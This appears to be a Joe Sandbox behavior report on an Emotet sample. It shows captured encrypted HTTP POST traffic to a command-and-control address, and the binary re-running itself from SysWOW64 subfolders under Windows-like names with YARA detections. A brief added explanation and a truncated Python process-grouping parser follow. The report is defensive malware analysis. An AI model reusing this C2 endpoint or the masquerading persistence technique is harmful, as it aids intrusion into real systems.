User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 87.106.139.101:8080
Content-Length: 4596
Connection: Keep-Alive
Cache-Control: no-cache
Feb 23, 2021 16:29:54.515777111 CET  10981               IN         HTTP/1.1 200 OK
Server: nginx
Date: Tue, 23 Feb 2021 15:29:54 GMT
Content-Type: test/html; charset=UTF-8
Content-Length: 535876
Connection: keep-alive
vary: Accept-Encoding
Data Raw: 54 8b 72 50 de f5 76 89 5a 5e a8 eb 0d d2 7c 59 31 32 2b 5b 3b e4 3d 5e 1f c2 c8 0e 6d a8 bc 4a 63 3f 74 61 9e b1 58 90 65 df c4 3b a7 5b 9c a3 ca ec d5 24 b6 42 0b c0 2c 7d fd a3 63 6b 01 c8 1c e9 9e 3c 79 02 f9 32 e7 d8 f7 6a 4c d6 bf 7e 96 bf 37 14 b8 74 15 80 fe 82 a7 09 2b 9e b6 ca e2 b6 f6 01 58 4e 61 20 d1 12 1b 26 45 00 91 ed 4c 7d 1d 54 89 c1 9f 7d 04 a7 22 8f 6e c3 f9 6d 0a a5 a8 18 a2 5e 35 cd cd 85 75 86 4e e5 6d 8e c1 14 b9 2a 32 a7 fc e7 da 1d 44 9a 42 8b cb e1 40 d0 27 50 03 d1 04 de 93 a1 54 03 ab 82 c6 47 95 ea 92 6d f7 64 ee 2f ec 30 be 3d 61 f5 49 31 7a 4d fd 01 8b 39 23 c5 6c 5f b5 a4 cf 3a a5 ca d7 2b 66 fb 99 77 4d 99 b9 fd 1c 03 c1 71 c2 43 bd 27 a5 95 2d 84 78 aa 6b fa 35 14 c3 9e 85 ad 37 dd 8c 9a 9f c7 b5 05 d7 95 45 b9 b2 21 7e f4 35 14 de 70 04 03 b2 66 e2 49 f9 ac 27 06 e1 f9 24 65 5d a2 52 6f c6 be 8e 1e e5 d3 13 35 6e fd fe 8d d1 16 00 54 25 34 ae 95 b1 76 43 6a f7 ea ed 0a 4b bc 89 d9 8f 1d 86 0e bf f6 a8 95 4e 92 24 33 c7 c5 0f 33 9c 41 67 83 2e e9 54 14 43 5b c3 c8 ae 82 62 d5 60 3d a0 70 d7 d5 57 67 c2 0d 91 79 8e ae 17 b8 60 f9 14 0a 7a b2 0b f5 5a 80 5a ae e3 a2 1e 1a 9b 46 23 b5 8e ba b5 a7 58 16 d3 98 f1 86 ac 57 9d ba 6b aa 1e 87 f6 dc 04 65 ad a9 eb 5d f5 ac 2f 89 17 ba e9 bf 4d a2 e7 4d 06 f0 8b 43 ac 60 47 e3 04 eb 75 01 d6 22 4f 90 ce fa 1e 61 70 6e 49 38 c5 42 d1 57 e8 2c 31 e6 77 e5 25 f3 12 e4 b5 84 45 d4 e6 8c 36 65 04 38 dd 8a d0 16 64 ee 06 8c 62 16 bc fe ce c7 f9 4d c3 7d db 03 f4 1d 21 36 df 18 06 94 32 85 07 f2 fc 56 e4 6d 48 2c e8 19 17 2a 9f 41 59 ef f7 6b 4f 3e 6f d2 30 62 85 61 ec cf 65 e7 b0 19 e0 dc c8 dc 1f 4a f0 46 e9 86 88 3f c3 49 a2 b2 7a ec 38 d5 38 7e 5c 29 75 88 d1 23 bb 16 a8 af a5 f3 ff 65 72 f5 e7 19 5c 52 93 6c 47 48 4b fa 1a 5a 53 e5 7b 93 75 48 13 f3 89 6d 58 00 7b fb 82 20 5b 27 04 57 79 8f 27 85 86 56 8f c4 67 5f 15 3d ca d5 47 57 67 87 2d 50 d3 c7 34 24 64 26 40 68 3b ce 24 99 b0 97 81 59 fd c7 9b 30 5b 86 49 7e 53 bd 0c 29 e1 b7 85 07 f7 44 82 df 90 41 da 84 c0 9a c3 f1 2f d4 d1 e7 af 7e 25 83 11 6a 14 8f 5a a7 db 89 b8 b4 82 5e e0 13 a6 23 0f 63 26 06 c9 5c b6 ca b6 ca a7 72 52 5d 99 85 33 c8 f5 a5 bf 54 13 a4 ec 0d dc 64 97 80 47 28 23 ec b3 50 75 3d 12 1c fd c5 32 d3 c4 4b a4 25 25 d6 9a 77 6a f1 1b f1 9f 15 17 93 59 64 80 cb 9a 4b 5d 31 c3 aa 57 40 3c 6c d0 bf ad b1 fd e2 49 bc 0f 1e c9 86 f7 ec 52 a3 1d f2 ea e1 2d 43 81 09 69 47 6c 9a 22 25 eb 4b 0c 0e 87 20 af 24 cc a0 63 cf 41 c0 09 fe 07 eb 2c 51 b4 c4 b3 93 a7 db 19 b0 67 4d 5c 6f 5b 58 9c ec 31 15 20 e4 49 42 d4 6e 19 33 7d a6 66 6c e5 d7 02 e0 72 03 85 45 9b 9c ee 14 cf d0 5c 4d eb 07 3a 23 73 ad e0 27 db 24 83 6b 39 16 ea 47 7a dd 97 83 6f b4 33 25 7e 94 39 43 27 71 9d 29 41 37 06 7f 75 67 af 28 e1 7a 92 da de b0 4d e7 da d9 88 7d f2 03 a0 ab c1 1d 9e 83 41 05 8b 5b bc 8c e0 76 3d 71 6e 32 cc 17 8f 05 32 1d d8 d2 c6 ed 5e f6 56 f9 d5 21 66 a2 5a ae 7f 83 13 62 55 d3 7b 16 4c 12 65 d3 32 ae e6 b7 49 05 1a 47 d3 3a ef 3e 81 01 86 fe 90 6e 11 f6 4d f2 7f 86 c7 f0 0c 05 e3 01 6e 10 a4 25 d2 bf a8 0a f8 da a3 a8 6b 13 86 11 4a f9 ce 8d 63 86 7b e1 36 b0 85 1b 41 52 2c e0 b3 50 71 3a f9 42 43 bc 0e 0c 60 6f aa 59 c9 5d 35 33 12 24 e9 a7 5a f7 d4 6b 8a ad df eb cb 09 24 48 38 d3 62 da 65 0e f7 6a 45 3e 29 d6 72 22 20 9e f5 4b ca f4 f9 c9 8d 8e 7a a3 9c bd e2 7f c7 39 7a 22 96 3a 60 1f a5 ff e7 0c dd 72 95 ce 6d 72 24 45 ac 62 c8 8c 93 40 c4 4c 7c 75 07 93 d4 c8 7e 5b 3e 94 1f bb 03 7b 8d 8b 49 46 96 e2 19 a4 bc 97 a9 89 6a c7 b4 7a 8d a2 3f b6 ec 89 40 80 e7 03 f5 d3 e7 8b
Data Ascii: TrPvZ^|Y12+[;=^mJc?taXe;[$B,}ck<y2jL~7t+XNa &EL}T}"nm^5uNm*2DB@'PTGmd/0=aI1zM9#l_:+fwMqC'-xk57E!~5pfI'$e]Ro5nT%4vCjKN$33Ag.TC[b`=pWgy`zZZF#XWke]/MMC`Gu"OapnI8BW,1w%E6e8dbM}!62VmH,*AYkO>o0baeJF?Iz88~\)u#er\RlGHKZS{uHmX{ ['Wy'Vg_=GWg-P4$d&@h;$Y0[I~S)DA/~%jZ^#c&\rR]3TdG(#Pu=2K%%wjYdK]1W@<lIR-CiGl"%K $cA,QgM\o[X1 IBn3}flrE\M:#s'$k9Gzo3%~9C'q)A7ug(zM}A[v=qn22^V!fZbU{Le2IG:>nMn%kJc{6AR,Pq:BC`oY]53$Zk$H8bejE>)r" Kz9z":`rmr$Eb@L|u~[>{IFjz?@
Feb 23, 2021 16:29:55.735622883 CET  11542               OUT        POST /LrBFYD0XkeH6Uxd/HqBc9ORyzrNJU/Ah5wivG5/fOm2sJDdlpsjYC5CZe/ HTTP/1.1
Referer: http://87.106.139.101/LrBFYD0XkeH6Uxd/HqBc9ORyzrNJU/Ah5wivG5/fOm2sJDdlpsjYC5CZe/
Content-Type: multipart/form-data; boundary=---------------------------478597482596704
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 87.106.139.101:8080
Content-Length: 4596
Connection: Keep-Alive
Cache-Control: no-cache
Feb 23, 2021 16:29:56.797887087 CET  11547               IN         HTTP/1.1 200 OK
Server: nginx
Date: Tue, 23 Feb 2021 15:29:56 GMT
Content-Type: test/html; charset=UTF-8
Content-Length: 132
Connection: keep-alive
vary: Accept-Encoding
Data Raw: 86 2d 97 64 dc 2f f8 df 14 38 07 51 47 c3 82 1e 9f a3 ba c8 d0 2b 43 69 bb 3b 52 61 27 3f 2a 29 23 ca ab b4 0c 87 79 27 e5 f8 12 aa 34 a6 67 1b cb d6 18 b7 d9 cd 1f 7e a9 3e d8 f6 74 85 25 34 ef 26 d3 d4 a7 7d dd 72 9d 53 6e ab e6 41 e3 1b 5d 14 0c 65 04 51 c3 9d 16 cd 48 17 e8 f2 17 79 96 33 16 89 ac 54 9d a3 23 36 b4 bc b1 be 1e e3 7b 1d ff ee a8 9b 7f 6a a9 e0 c1 90 86 7c bc 82 62 c4 e5 da
Data Ascii: -d/8QG+Ci;Ra'?*)#y'4g~>t%4&}rSnA]eQHy3T#6{j|b


Code Manipulations

Statistics

Behavior


System Behavior

General

Start time: 16:28:33
Start date: 23/02/2021
Path: C:\Users\user\Desktop\MV9tCJw8Xr.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\MV9tCJw8Xr.exe'
Imagebase: 0x400000
File size: 262144 bytes
MD5 hash: B12817C1C8BA085A7A82655FBA90E53D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.243322939.00000000021E1000.00000020.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.243267422.0000000002180000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.243296865.00000000021C4000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 16:28:40
Start date: 23/02/2021
Path: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe
Imagebase: 0x400000
File size: 262144 bytes
MD5 hash: B12817C1C8BA085A7A82655FBA90E53D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.409946208.00000000020C4000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.409716178.00000000005B0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.410029176.00000000021D1000.00000020.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 16:28:48
Start date: 23/02/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase: 0x7ff641cd0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                General

                                                                                                                Start time:16:28:58
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                Imagebase:0x7ff641cd0000
                                                                                                                File size:51288 bytes
                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high

                                                                                                                General

                                                                                                                Start time:16:28:59
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                Imagebase:0x7ff6e70f0000
                                                                                                                File size:51288 bytes
                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high

                                                                                                                General

                                                                                                                Start time:16:29:00
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                Imagebase:0x7ff641cd0000
                                                                                                                File size:51288 bytes
                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high

                                                                                                                General

                                                                                                                Start time:16:29:00
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                Imagebase:0x7ff6f5060000
                                                                                                                File size:163336 bytes
                                                                                                                MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high

                                                                                                                General

                                                                                                                Start time:16:29:01
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                Imagebase:0x7ff641cd0000
                                                                                                                File size:51288 bytes
                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high

                                                                                                                General

                                                                                                                Start time:16:29:04
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                Imagebase:0x7ff641cd0000
                                                                                                                File size:51288 bytes
                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high

                                                                                                                General

                                                                                                                Start time:16:29:23
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                Imagebase:0x7ff641cd0000
                                                                                                                File size:51288 bytes
                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high

                                                                                                                General

                                                                                                                Start time:16:29:36
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                Imagebase:0x7ff641cd0000
                                                                                                                File size:51288 bytes
                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high

                                                                                                                General

                                                                                                                Start time:16:29:47
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                Imagebase:0x7ff641cd0000
                                                                                                                File size:51288 bytes
                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high

                                                                                                                General

                                                                                                                Start time:16:29:55
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:'C:\Windows\SysWOW64\DefaultPrinterProvider\\tokenbinding2.exe' YAQAADwAAABEAGUAZgBhAHUAbAB0AFAAcgBpAG4AdABlAHIAUAByAG8AdgBpAGQAZQByAFwASwBCAEQASABFAEIAAAA=
                                                                                                                Imagebase:0xa40000
                                                                                                                File size:662528 bytes
                                                                                                                MD5 hash:13B9D586BB973AC14BFA24E4AE7B24F1
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000016.00000002.413932910.0000000002EB0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000016.00000002.414052123.0000000002F14000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000016.00000002.412800025.0000000000401000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                • Detection: 59%, Metadefender, Browse
                                                                                                                • Detection: 93%, ReversingLabs
                                                                                                                Reputation:low

                                                                                                                General

                                                                                                                Start time:16:29:59
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe
                                                                                                                Imagebase:0xa40000
                                                                                                                File size:662528 bytes
                                                                                                                MD5 hash:13B9D586BB973AC14BFA24E4AE7B24F1
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000017.00000002.419691301.0000000002B60000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000017.00000002.417949677.0000000000401000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000017.00000002.420026339.0000000002BC4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                Reputation:low

                                                                                                                General

                                                                                                                Start time:16:30:01
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                                                                                                                Imagebase:0x7ff7bfb80000
                                                                                                                File size:455656 bytes
                                                                                                                MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high

                                                                                                                General

                                                                                                                Start time:16:30:02
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff774ee0000
                                                                                                                File size:625664 bytes
                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high

                                                                                                                General

                                                                                                                Start time:16:30:02
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exe
                                                                                                                Imagebase:0xa40000
                                                                                                                File size:662528 bytes
                                                                                                                MD5 hash:13B9D586BB973AC14BFA24E4AE7B24F1
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001A.00000002.428286473.0000000000401000.00000020.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001A.00000002.429639515.0000000002CD4000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001A.00000002.429459440.0000000002C70000.00000040.00000001.sdmp, Author: Joe Security

General

Start time:16:30:07
Start date:23/02/2021
Path:C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exe
Imagebase:0xa40000
File size:662528 bytes
MD5 hash:13B9D586BB973AC14BFA24E4AE7B24F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001B.00000002.439198093.00000000030A4000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001B.00000002.433437120.0000000000401000.00000020.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001B.00000002.438746003.0000000001350000.00000040.00000001.sdmp, Author: Joe Security

General

Start time:16:30:09
Start date:23/02/2021
Path:C:\Windows\SysWOW64\glu32\usp10.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\glu32\usp10.exe
Imagebase:0xa40000
File size:662528 bytes
MD5 hash:13B9D586BB973AC14BFA24E4AE7B24F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001C.00000002.442107298.0000000002E30000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001C.00000002.439928850.0000000000401000.00000020.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001C.00000002.442504698.0000000002E94000.00000004.00000001.sdmp, Author: Joe Security

General

Start time:16:30:12
Start date:23/02/2021
Path:C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exe
Imagebase:0xa40000
File size:662528 bytes
MD5 hash:13B9D586BB973AC14BFA24E4AE7B24F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001D.00000002.446724023.0000000003274000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001D.00000002.446019093.0000000001850000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001D.00000002.443777034.0000000000401000.00000020.00000001.sdmp, Author: Joe Security

General

Start time:16:30:14
Start date:23/02/2021
Path:C:\Windows\SysWOW64\ndfapi\msrd2x40.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\ndfapi\msrd2x40.exe
Imagebase:0xa40000
File size:662528 bytes
MD5 hash:13B9D586BB973AC14BFA24E4AE7B24F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001E.00000002.447921757.0000000000401000.00000020.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001E.00000002.449294722.0000000001310000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001E.00000002.449645390.0000000002D64000.00000004.00000001.sdmp, Author: Joe Security

General

Start time:16:30:16
Start date:23/02/2021
Path:C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exe
Imagebase:0xa40000
File size:662528 bytes
MD5 hash:13B9D586BB973AC14BFA24E4AE7B24F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001F.00000002.464467088.0000000002971000.00000020.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001F.00000002.463773326.00000000028B0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001F.00000002.464108385.0000000002914000.00000004.00000001.sdmp, Author: Joe Security

General

Start time:16:30:22
Start date:23/02/2021
Path:C:\Windows\SysWOW64\Chakrathunk\jscript9.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\Chakrathunk\jscript9.exe
Imagebase:0xa40000
File size:662528 bytes
MD5 hash:13B9D586BB973AC14BFA24E4AE7B24F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000020.00000002.468787553.00000000029E4000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000020.00000002.468454177.0000000002980000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000020.00000002.465519796.0000000000401000.00000020.00000001.sdmp, Author: Joe Security

General

Start time:16:30:24
Start date:23/02/2021
Path:C:\Windows\SysWOW64\ftp\wmvdspa.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\ftp\wmvdspa.exe
Imagebase:0xa40000
File size:662528 bytes
MD5 hash:13B9D586BB973AC14BFA24E4AE7B24F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000022.00000002.470554430.0000000000401000.00000020.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000022.00000002.477958707.00000000031B0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000022.00000002.478389759.0000000003214000.00000004.00000001.sdmp, Author: Joe Security

General

Start time:16:30:27
Start date:23/02/2021
Path:C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exe
Imagebase:0xa40000
File size:662528 bytes
MD5 hash:13B9D586BB973AC14BFA24E4AE7B24F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000024.00000002.482749716.00000000025B0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000024.00000002.483313060.0000000002671000.00000020.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000024.00000002.483058248.0000000002614000.00000004.00000001.sdmp, Author: Joe Security

General

Start time:16:30:31
Start date:23/02/2021
Path:C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exe
Imagebase:0xa40000
File size:662528 bytes
MD5 hash:13B9D586BB973AC14BFA24E4AE7B24F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000025.00000002.493970869.0000000002AE0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000025.00000002.492699981.0000000000401000.00000020.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000025.00000002.494214004.0000000002B44000.00000004.00000001.sdmp, Author: Joe Security

General

Start time:16:30:37
Start date:23/02/2021
Path:C:\Windows\SysWOW64\d3dramp\mprdim.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\d3dramp\mprdim.exe
Imagebase:0xa40000
File size:662528 bytes
MD5 hash:13B9D586BB973AC14BFA24E4AE7B24F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
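
Every process block above is the same 662528-byte binary (MD5 13B9D586BB973AC14BFA24E4AE7B24F1, imagebase 0xa40000) re-executed from a fresh subfolder of C:\Windows\SysWOW64, with folder and file names that coincide with Windows module names (glu32\usp10.exe, Chakrathunk\jscript9.exe and so on). The Python below is an added example and not part of the Joe Sandbox report: it parses blocks in this report's key:value layout, groups processes by MD5 so the one-binary-many-paths pattern is visible, and flags executables that sit exactly one folder below SysWOW64 outside an assumed allowlist. The allowlist (wbem), the path regex and the function names are the example's own assumptions; the sample input is an abridged transcription of three blocks from this page.

```python
import re
from collections import defaultdict

# Constructed sample input: three process blocks abridged from the report above
# (same field names and values), embedded so the parser runs offline.
SAMPLE_REPORT = r"""
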